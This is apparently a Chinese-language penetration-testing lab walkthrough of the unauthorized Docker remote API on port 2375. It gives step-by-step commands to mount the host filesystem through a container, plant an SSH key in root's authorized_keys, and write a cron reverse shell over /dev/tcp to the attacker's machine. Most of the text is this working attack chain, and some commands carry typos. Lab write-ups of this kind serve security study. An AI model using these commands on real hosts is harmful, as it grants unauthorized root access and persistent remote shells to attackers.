一.Docker简介
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。(Sandbox又叫沙箱、沙盘,即是一个虚拟系统程序,允许你在沙盘环境中运行浏览器或其他程序,因此运行所产生的变化可以随后删除)
二.Docker漏洞产生原因
因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。
三.Docker未授权漏洞复现
1.docker实验环境
目标机器: CentOS7+Docker、IP:10.1.1.200
攻击机器:Kali+Docker、IP:10.1.1.100
虚拟机实验环境链接:https://www.hetianlab.com/expc.do?ec=ECIDcc41-1aa8-4db8-8f69-7e834b8aa17b
来源:合天网安实验室
2.漏洞复现
第一步,信息收集
nmap -p- -sV -T4 10.1.1.200
第二步,访问2375端口
发现page not found(页面没有找到)代表json代表2375有存在漏洞
第三步,查看info目录
info一般指的是安全目录,通过安全目录查看docker消息
获取image
10.1.1.200:2375/images/json
第四步,docker链接目标机器
通过docker -H参数连接目标docker
docker -H tcp://10.1.1.200 ps -a //列出所有容器
docker -H tcp://10.1.1.200 images //列出所有镜像
docker -H tcp://10.1.1.200 start 3dc8d67b679 //开启一个停止的容器
连接一个已经启动的容器:四种方法
docker - H tcp://10.1.1.200 exec -it 3dc8d67b679 bash
docker - H tcp://10.1.1.200 attach 3dc8d67b679(容器id)
docker -H tcp://10.1.1.200 run -it -v /:/mnt--entrypoint /bin/bash 4c9608fd76ba(镜像的id)
//mnt为挂载点 ----entrypoint是入口
docker -H tcp://10.1.1.200:2375 run -it -v /:/mnt busybox chroot /mnt sh //创建一个新的容器busybox容器,讲宿主机的磁盘挂载到容器
** 第五步.docker未授权写ssh公钥得到shell:**
docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba //启动一个容器,挂载宿主机的/mnt目录
ssh-keygen -t rsa //生成一个ssh公钥
cat /root/.ssh/id_rsa.pub //查看生成的公钥
讲公钥写到目标/root/.ssh/authorized_keys文件中
公钥内容:
echo "sshrsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2ireX9ybOimMcML2K4gDqC4q0Gx7tgg1K6l4gYUHKQ/00a6O4l5cENirdgWrL/5S6Z/7LkVrxeQQKSKUjvk/3v+o3fE8ArdNLUbyGIDhsabuHLpgs5bT+HTrIegvymhMbftPnwYiR2GRZ+vNdQuIJjwD+nTQGR8ANOLSKNH0uIb1ZgOMcJC2IHIqtueC2t/MhY6Ot8mZnPCijeRfZean4AELfa2EJ0KZy1n68s1IJHJJuAo6+Ckf81dB1gnRtsm/5jp5YW/AEv9GfcrYv6+22hlFN2MAt1JH+iRPup/9joofCG/eSGEZmhPfjcPguhTOt4GqjqPVlPpWPSsGzjYnWpRrjJpVEdcoli9MaobCja/YtO1iN2SgLUUeMSRf+ysNHuvd5oOIpJBMYiGjY2pwZ45zEuqvI2P+zjCxVCYNhzVKNv+7FIaDLYZQPSMn9bYf6j0zhrvDuPWUkI0iaDTlf0Oq1nwesWDhJRIybWMfTjV+UdDxNvz2GiMKo73GLvhs= root@kali" > /mnt/root/.ssh/authorized_keys
**>**这个代表的意思为覆盖 所以在最后一句加入的意思是讲公钥内容覆盖到/mnt/root/.ssh/authorized_keys中
第六步 ,ssh进行连接
ssh root@10.1.1.200 -i id_rsa
四,docker未授权写定时任务获取shell
1.启动容器挂载到宿主机
docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba
2.kali开启监听
nc -lvvp 1212 //监听1212端口
3.写入定时反弹shell
echo "* * * * * /bin/bash -i >& /dev/tcp/10.1.1.100/1212 0>&1" > /mnt/var/spool/cron/root
4.查看定时任务
cat /mnt/var/spool/cron/root //查看写入到/mnt/var/spool/cron/root的任务
5.获得目标shell
输入whoami查看用户
实验结束!!!
版权归原作者 干掉芹菜 所有, 如有侵权,请联系我们删除。